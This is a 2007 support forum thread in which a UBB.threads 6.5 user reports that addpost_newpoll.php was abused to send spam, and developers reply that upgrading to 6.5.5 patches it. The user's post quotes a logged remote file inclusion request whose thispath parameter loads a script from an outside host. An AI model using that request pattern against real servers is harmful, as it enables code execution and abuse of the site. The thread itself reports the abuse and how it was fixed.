Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
UBBDev.com
UBBWiki.com
Who's Online Now
2 registered members (isaac, pandama), 88 guests, and 140 spiders.
Key: Admin, Global Mod, Mod
Member Spotlight
Posts: 467
Joined: August 2004
Show All Member Profiles 
Top Posters(30 Days)
isaac 22
Ruben 10
Gizmo 8
Morgan 3
Geoff 3
FREAK 2
Slaz 2
DennyP 1
Latest Photos
Test
Testing to drag photos
Comfortable Cats
Test
BSA photos
Previous Thread
Next Thread
Print Thread
extreme security bug used to send ou 100.000s of spam emails #194771
08/21/07 04:34 AM
08/21/07 04:34 AM
W
wnedoe  Offline OP
stranger
Joined: Aug 2007
Posts: 1
I use version 6.5

My provider informed me that the UBBT script addpost_newpoll.php
was used to send ou more than 100.000 spam emails and nearly cancelled my contract.

It seems that this is a well known bug at least to spammers as they had even programmed a complete USER INTERFACE for sending spam with UBBt and so probably millions of spam emails are sent out each day with he help of ubbt.

The way this script is/was abused

/forum//addpost_newpoll.php?addpoll=preview&thispath=http://geocities.com/uza_mere/uza.txt? HTTP/1.1" 200

(the abuse script has gone at this place but is probably to be found at a lot of places elsewhere

Re: extreme security bug used to send ou 100.000s of spam emails [Re: wnedoe] #194772
08/21/07 05:19 AM
08/21/07 05:19 AM
Gizmo  Offline
UBB.threads Developer
Joined: Jun 2006
Posts: 16,956
Portland, OR; USA
Are you running 6.5? If so, security issues are well known in builds prior to 6.5.5, you should consider upgrading.


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Forums: A Gardeners Forum Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: extreme security bug used to send ou 100.000s of spam emails [Re: Gizmo] #194779
08/21/07 10:55 AM
08/21/07 10:55 AM
R
Rick  Offline
Former Developer
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
Yes, we sent out an email to all of our customers when we were made aware of this and had a patch out to fix it. You should definitely at least upgrade to 6.5.5 at the minimum.


Shout Box
Today's Birthdays
whk
Recent Topics
UBB.threads 7.6.2 - Released
by isaac. 09/17/18 08:08 AM
7.6.2 Changelog Discussion
by isaac. 09/17/18 06:35 AM
Upgrade Documentation
by DennyP. 09/15/18 03:55 PM
PHP 7.2
by Geoff. 09/12/18 10:22 PM
Email Cleanup-Is it possible?
by Ruben. 09/06/18 11:25 AM
Forum Statistics
Forums36
Topics35,140
Posts191,445
Members12,106
Most Online978
Jun 24th, 2007
Random Image
Powered by UBB.threads™ PHP Forum Software 7.6.2